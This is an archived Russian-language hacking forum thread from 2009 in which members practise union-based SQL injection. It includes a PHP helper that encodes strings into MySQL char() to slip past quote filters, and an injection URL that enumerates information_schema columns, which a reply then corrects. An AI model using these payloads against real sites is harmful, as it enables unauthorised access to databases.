ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.01.2009, 21:08
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от kevmen
Iceangel_,в таблице записей нет)вообще)
А запрос верно составлен?
Если 3 и 4 поля принтабельные - верно
|
|
|
23.01.2009, 21:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Gemini12
пароль помнишь?
Ой, сорри, 123
|
|
|
|
23.01.2009, 21:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
PHP код:
<?php
function form(){
echo "<hr>";
echo "<form action=? method=GET>";
echo "Word:<input name=string type=text>";
echo "<input type=submit value=OK>";
echo "</form>";
}
if (!isset($_GET['string'])){
form();
exit;
}
$string=$_GET['string'];
for ($i=0;$i<strlen($string);$i++){
$str_arr[$i]=substr($string,$i,1);
}
$result='';
for ($i=0;$i<count($str_arr);$i++){
if ($i==count($str_arr)-1){
$result=$result.ord($str_arr[$i]);
}else{
$result=$result.ord($str_arr[$i]).",";
}
}
echo "<textarea>char(".$result.")</textarea>";
form();
?>
Вот, накатал быстро, если еще кому-то надо, энкодит слово в чар. |
|
|
|
23.01.2009, 21:31
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
mailbrush, в разных диалектах SQL по разному применяется функция CHAR... Так же в разных диалектах по разному используется операция "конкатенация", поэтому возможно ещё варианты... Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!
|
|
|
|
23.01.2009, 21:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
К чему ещё один "велосипед"?
К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.
|
|
|
|
23.01.2009, 21:40
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!
Посмотрим.. Это для мускуля было.
|
|
|
|
23.01.2009, 21:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.
Это гуд, не искал, знач мну писать не надо, но для себя потренируюсь.
|
|
|
|
23.01.2009, 22:35
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
идиотством страдаю,пока на все 100% не закреплю ,дальше не пойду)
http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1
Точно знаю, что в таблице есть строки
addedrequests-название таблицы
но выводит,что запрос прошел,однако данных нет!
Последний раз редактировалось kevmen; 23.01.2009 в 22:40..
|
|
|
|
23.01.2009, 22:40
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
kevmen А может всё-же почитать что-то нужно? Статьи ведь пишут не для того, что-бы сдесь их по новой всем индивидуально перессказывать
http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1
Столбец, из шемы, где столбец. Видимо ты хотел написать, +where+table_name='имя_таблицы'
Последний раз редактировалось jokester; 23.01.2009 в 22:46..
|
|
|
|
23.01.2009, 22:41
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
jokester
ЧитаЛ
Читаю вот
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
и вот
http://forum.antichat.ru/thread43966.html
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
